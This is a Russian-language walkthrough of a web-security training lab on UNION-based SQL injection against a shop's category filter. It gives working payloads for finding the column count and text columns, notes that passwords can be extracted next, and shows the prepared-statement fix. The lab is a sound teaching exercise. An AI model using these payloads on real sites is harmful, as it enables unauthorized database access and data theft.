*Скрины данной лабы будут загружены в папку Скриншоты*
Как решается эта лабораторная работа:
Шаг 1: Находим уязвимый параметр
Лаборатория содержит интернет-магазин с фильтром товаров по категориям (например, category=Gifts). При выборе категории в URL передаётся параметр:
text
/filter?category=Gifts
Шаг 2: Тестируем на SQL-инъекцию UNION
Первая попытка:
text
/filter?category='+UNION+SELECT+NULL--
Результат: Ошибка! 
/filter?category='+UNION+SELECT+NULL,NULL--
Результат: Снова ошибка!
Пробуем три столбца:
text
/filter?category='+UNION+SELECT+NULL,NULL,NULL--
Результат: УСПЕХ! Страница загружается нормально, и в таблице товаров появляется дополнительная пустая строка.
❓ В чём была ошибка?
Ошибка разработчиков: они не валидировали и не экранировали пользовательский ввод в параметре category.
Уязвимый код (примерно так он мог выглядеть):
sql
SELECT * FROM products WHERE category = '$user_input'
Вместо безопасного:
sql
SELECT * FROM products WHERE category = ?
-- с использованием подготовленных выражений (prepared statements)
🎯 Для чего это нужно?
1. Фундамент для полноценной SQL-инъекции UNION
Определение количества столбцов — первый обязательный шаг перед тем как:
Извлекать пароли пользователей
Получать данные других таблиц
Обходить аутентификацию
2. Понимание структуры запроса
Зная, что запрос возвращает 3 столбца, мы можем:
Подставить реальные данные вместо NULL
Определить, какие столбцы содержат текстовые данные (нужны для извлечения строк)
3. Пример дальнейшей эксплуатации:
После того как мы узнали, что столбцов 3:
sql
' UNION SELECT 'a','b','c'--
Это поможет определить, какие столбцы текстовые (принимают строки 'a','b','c'), а какие числовые.
🔧 Технические детали решения:
Конструкция payload:
text
'+UNION+SELECT+NULL,NULL,NULL--
' — закрываем открывающую кавычку в исходном запросе
+ — заменяет пробел (URL-кодирование)
UNION SELECT — добавляем второй запрос
NULL,NULL,NULL — три столбца (подбираем нужное количество)
-- — комментируем остаток запроса, включая закрывающую кавычку
// Использование Prepared Statements
String query = "SELECT * FROM products WHERE category = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, userInput);
